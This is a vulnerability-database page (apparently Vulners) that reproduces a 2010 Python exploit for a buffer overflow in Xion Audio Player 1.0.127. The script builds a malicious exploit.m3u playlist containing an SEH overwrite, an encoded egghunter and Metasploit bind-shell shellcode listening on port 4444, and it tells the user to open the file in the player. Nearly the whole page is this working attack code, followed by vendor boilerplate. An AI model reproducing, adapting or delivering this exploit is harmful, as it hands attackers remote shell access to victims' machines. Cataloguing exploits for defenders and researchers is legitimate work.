Vulners
Lucene search
Xion Audio Player 1.0.127 Buffer Overflow
`# Exploit Title: Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability
# Date: 11/23/2010
# Author: 0v3r
# Software Link: http://www.r2.com.au/downloads/files/xion_v1.0b127.exe
# Version: 1.0.127
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
# encoded with alpha3 encoder by skylined
egghunter = ("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAI"
"AJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO"
"0B0R1ZKR0X8MNNOLKU0Z2TJO6X2W00002T4KJZ6O2U9Z6O2U9WKO9WKPA")
#win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode= ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x37\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x47"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x57\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x4d\x39\x49\x6c\x33"
"\x5a\x48\x6b\x42\x6d\x38\x68\x5a\x59\x6b\x4f\x49\x6f\x4b\x4f\x63"
"\x50\x6c\x4b\x30\x6c\x64\x64\x64\x64\x6c\x4b\x50\x45\x67\x4c\x4c"
"\x4b\x51\x6c\x37\x75\x61\x68\x76\x61\x58\x6f\x4e\x6b\x52\x6f\x72"
"\x38\x4c\x4b\x73\x6f\x45\x70\x43\x31\x68\x6b\x31\x59\x4c\x4b\x70"
"\x34\x4c\x4b\x57\x71\x7a\x4e\x34\x71\x4f\x30\x6e\x79\x6c\x6c\x6b"
"\x34\x6f\x30\x43\x44\x33\x37\x6b\x71\x69\x5a\x76\x6d\x53\x31\x49"
"\x52\x5a\x4b\x4c\x34\x45\x6b\x52\x74\x41\x34\x54\x68\x50\x75\x38"
"\x65\x6c\x4b\x63\x6f\x54\x64\x53\x31\x38\x6b\x43\x56\x4e\x6b\x36"
"\x6c\x72\x6b\x4e\x6b\x53\x6f\x75\x4c\x34\x41\x78\x6b\x64\x43\x64"
"\x6c\x6e\x6b\x4b\x39\x50\x6c\x41\x34\x65\x4c\x52\x41\x7a\x63\x64"
"\x71\x69\x4b\x51\x74\x6e\x6b\x71\x53\x66\x50\x4c\x4b\x77\x30\x74"
"\x4c\x6c\x4b\x74\x30\x45\x4c\x4c\x6d\x6e\x6b\x43\x70\x33\x38\x73"
"\x6e\x53\x58\x4c\x4e\x50\x4e\x64\x4e\x38\x6c\x46\x30\x6b\x4f\x4e"
"\x36\x65\x36\x61\x43\x63\x56\x33\x58\x36\x53\x34\x72\x71\x78\x44"
"\x37\x34\x33\x46\x52\x41\x4f\x42\x74\x6b\x4f\x48\x50\x65\x38\x5a"
"\x6b\x7a\x4d\x39\x6c\x45\x6b\x52\x70\x4b\x4f\x6a\x76\x71\x4f\x4e"
"\x69\x6d\x35\x50\x66\x6d\x51\x7a\x4d\x63\x38\x33\x32\x32\x75\x50"
"\x6a\x43\x32\x79\x6f\x38\x50\x45\x38\x68\x59\x73\x39\x4c\x35\x4e"
"\x4d\x56\x37\x6b\x4f\x6a\x76\x76\x33\x30\x53\x71\x43\x76\x33\x71"
"\x43\x41\x53\x76\x33\x73\x73\x71\x43\x6b\x4f\x4e\x30\x71\x76\x31"
"\x78\x37\x61\x41\x4c\x70\x66\x46\x33\x4b\x39\x48\x61\x6d\x45\x70"
"\x68\x39\x34\x57\x6a\x30\x70\x4b\x77\x72\x77\x6b\x4f\x78\x56\x31"
"\x7a\x46\x70\x61\x41\x63\x65\x6b\x4f\x4e\x30\x35\x38\x6c\x64\x6c"
"\x6d\x36\x4e\x6d\x39\x46\x37\x6b\x4f\x5a\x76\x42\x73\x71\x45\x59"
"\x6f\x68\x50\x75\x38\x6b\x55\x37\x39\x6c\x46\x67\x39\x46\x37\x69"
"\x6f\x4a\x76\x70\x50\x73\x64\x46\x34\x61\x45\x6b\x4f\x78\x50\x6d"
"\x43\x42\x48\x6b\x57\x54\x39\x6b\x76\x50\x79\x50\x57\x6b\x4f\x48"
"\x56\x70\x55\x49\x6f\x6a\x70\x45\x36\x41\x7a\x73\x54\x75\x36\x62"
"\x48\x65\x33\x30\x6d\x6e\x69\x7a\x45\x30\x6a\x52\x70\x63\x69\x75"
"\x79\x48\x4c\x4f\x79\x6d\x37\x71\x7a\x57\x34\x6e\x69\x58\x62\x67"
"\x41\x6b\x70\x69\x63\x6e\x4a\x4b\x4e\x77\x32\x66\x4d\x6b\x4e\x41"
"\x52\x66\x4c\x5a\x33\x6c\x4d\x51\x6a\x66\x58\x6e\x4b\x4c\x6b\x4e"
"\x4b\x42\x48\x70\x72\x69\x6e\x78\x33\x67\x66\x6b\x4f\x70\x75\x67"
"\x34\x4b\x4f\x4e\x36\x33\x6b\x70\x57\x56\x32\x50\x51\x46\x31\x46"
"\x31\x41\x7a\x54\x41\x30\x51\x41\x41\x66\x35\x30\x51\x69\x6f\x4e"
"\x30\x50\x68\x6c\x6d\x5a\x79\x77\x75\x4a\x6e\x52\x73\x39\x6f\x58"
"\x56\x30\x6a\x4b\x4f\x6b\x4f\x50\x37\x59\x6f\x6e\x30\x6c\x4b\x36"
"\x37\x79\x6c\x6d\x53\x78\x44\x31\x74\x4b\x4f\x6b\x66\x30\x52\x69"
"\x6f\x6e\x30\x65\x38\x6a\x50\x6e\x6a\x76\x64\x73\x6f\x63\x63\x49"
"\x6f\x4b\x66\x69\x6f\x4e\x30\x47")
junk = "A" * 221
nseh = "\x61" #popad
nseh += "\x6e" #nop/align
seh = "\x7b\x41" # POP POP RET
#fix eax to point to the egghunter
prepare = "\x6e" #nop/align
prepare += "\x05\x14\x11" #add eax,0x11001400
prepare += "\x6e" #nop/align
prepare += "\x2d\x13\x11" #sub eax,0x11001300
prepare += "\x6e" #nop/alignn
#jump to eax
jump = "\x50" #push eax
jump +="\x6e" #nop/align
jump += "\xc3" #retn
#align buffer to hit the egghunter
align = "D" * 112
#few junk before shellcode
preshell = "D" * 500
#the egghunters tag
egg = "w00tw00t"
#few more junk after our shellcode
#I noticed that the bigger the buffer the more reliable the exploit
postshell= "E" * (12000 - len(junk + nseh + seh + preshell + jump + align + egghunter + egg + preshell + shellcode ))
#the final buffer
buff = junk + nseh + seh + prepare + jump + align + egghunter + preshell + egg + shellcode + postshell
try:
f = open("exploit.m3u",'w')
f.write(buff)
f.close()
print "\n"
print "\t-----------------------------------------------------------------"
print "\t| Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability |"
print "\t-----------------------------------------------------------------"
print "\n"
print "\t- File successfully created..."
print "\t- To run exploit open the file exploit.m3u with Xion Audio Player...\n"
except:
print "\t-Oooops! Can't write file ...\n"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Nov 2010 00:00Current
1Low risk
Vulners AI Score1